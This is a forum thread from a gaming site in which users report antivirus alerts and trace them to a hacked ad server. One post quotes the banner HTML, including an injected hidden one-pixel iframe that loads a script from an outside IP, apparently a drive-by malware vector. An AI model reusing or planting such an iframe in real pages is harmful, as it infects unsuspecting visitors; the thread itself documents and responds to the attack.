Virus on the main page?

DPB

Sentinel
Joined
September 30, 2009
Messages
210
Location
UK
The forums don't seem to be affected, but when I try access the main page avast gives me 'A Virus Was Found!' warning and obviously I click abort connection to prevent it loading. Is this just a false positive?

The warning shows:

Filename: http://www.rpgwatch.com/\{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 100710-1, 10/07/2010
 
Joined
Sep 30, 2009
Messages
210
Location
UK
I also get this warning but it appears to come from another place:

194.8.250.211/tds/in.cgi?default

194.8.250.211 site info

194.8.250.211 IP:
194.8.250.211

194.8.250.211 server location:
Paraguay

194.8.250.211 ISP:
Donstroy Ltd.

Looks kind of fishy ?
 
Joined
Oct 25, 2006
Messages
6,292
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, i got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.
 
I certainly can't swear that it is a false positive, but I have been here from day one and never heard of any virus issues on the site. I have seen people say they got false positives over the years.
I know management will respond when they see your question. This is his middle of the night so check back in about 6 to 8 hours.
 
Joined
Oct 18, 2006
Messages
2,384
Location
Missouri USA
Could be a false positive, but just recently there were similar issues on the Titan Quest forums; somebody/something had injected the main page code with links to plugins or some other type of infected content. I'm not familiar with the technical details, but it wasn't the site owners doing in any case.
 
Windows Defender found something,definitely has to do something with Java.
 
Joined
Aug 17, 2008
Messages
1,718
Location
Dear Green Place
There's an iframe in the banner.

It's the ads delivery that contains the virus.
http://www.rpgwatch.com/Scripts/openx/www/delivery/ajs.php?zoneid=1

<div class="header">
<a href="/" style="float:left; outline:none; background:none"><img src="/Skins/Default/Images/invis.png" width="170" height="100" /></a>
<div class="banner-top">
<a href='http://www.rpgwatch.com/Scripts/openx/www/delivery/ck.php?oaparams=2__bannerid=2__zoneid=1__cb=34dcb7bbc7__oadest=http%3A%2F%2Fwww.gog.com%2Fen%2Ffrontpage%2Fpp%2Ff6e1126cedebf23e1463aee73f9df08783640400' target='_blank'><img src='http://www.rpgwatch.com/Scripts/openx/www/images/4d2ed333f245d7c9b96d1d8aee3627a8.jpg' width='468' height='60' alt='Register at GOG through us' title='Register at GOG through us' border='0' /></a><div id='beacon_34dcb7bbc7' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www.rpgwatch.com/Scripts/openx/www/delivery/lg.php?bannerid=2&campaignid=1&zoneid=1&loc=http%3A%2F%2Fwww.rpgwatch.com%2F&referer=http%3A%2F%2Fwww.rpgwatch.com%2Fforums%2Fshowthread.php%3Fp%3D1061017633&cb=34dcb7bbc7' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div><iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe> </div>
</div>
 
Last edited:
Joined
Mar 30, 2008
Messages
1,163
Location
Scandinavia
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, i got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

I seen the prompt to install missing plug-in as well. I didn't click it but closed it; Microsoft Security Essential didn't alert me of possible virus.
 
Joined
Oct 19, 2006
Messages
1,028
Location
Malaysia
Got the same problem. The owner of the site is Donstroy which apparently owns several .RU websites which makes me concerned. I tried to manually download the \\194.8.250.216\public\veyron.jar file it was trying to access our of curiosity but cannot seem to which is probably for the best. Could be an ad for Bugatti Veyron but I really doubt it.

I suspect they are trying to exploit a security vulnerability on some versions of the java deployment toolkit. So I would recommend updating or disabling that addin in whatever browser you use.

Edit: Link to all the nasty stuff detected from that domain
 
Last edited:
Joined
Apr 23, 2010
Messages
688
Myrthos is still asleep I guess, and I'm unfortunately not at home at the moment. I'll check what I can when I'm back.
 
Joined
Aug 30, 2006
Messages
3,486
Firefox 2.x says it wants another plugin to be installed - and that is an "Adobe Reader Plugin" it wants.

This is - by the way - a quite new kind of "drive-by infection" that has become increasingly and alarmingly common.

I think you might switch off the ads altogether and then look what's happening.

I have seen the exactly same advertisement banner both on a game-related web site and on a Poboards-based forum a few months ago, which BOTH triggered the same NOD32 alarm ...

So I'm sure this new kind of infection hides within advertisement banners.
 
Joined
Nov 5, 2006
Messages
21,893
Location
Old Europe
I've got the same problem five hours ago. My Nod32 antivirus program gave me a virus threat error. It seems to be fine now.
 
Joined
Oct 30, 2006
Messages
1,180
Location
Sigil
I disabled the ads until Myrthos can figure out where, why and how this happened. Thanks for the reports everyone and sorry for the delay. Can't offer any further info yet.
 
Joined
Aug 30, 2006
Messages
3,486
Thank you, Arhu, for disabling the ads. I did apparently catch something. However, after a few restarts and a return to the defaults settings for Internet Explorer as well as removing all passwords etc. it seems fine now.

Incidentally, Gameboomers and the Mystery Manor Site have also been the target for attacks by hackers, it seems.
 
Joined
Oct 18, 2006
Messages
2,147
Location
Denmark, Europe
Both Firefox and Chrome now block the site,hope Myrthos can sort it out quickly.
 
Joined
Aug 17, 2008
Messages
1,718
Location
Dear Green Place
Apparently our ads software was hacked. There are some messages on the net that even the latest version of our ads software might not be safe so for the time being we'll just have to live without ads until all the issues are fixed.

In the meantime I've requested to be removed from the malware list, which is helpfull for those using Firefox or Chrome.

Sorry about this.
 
Last edited:
Joined
Aug 30, 2006
Messages
11,223
Back
Top Bottom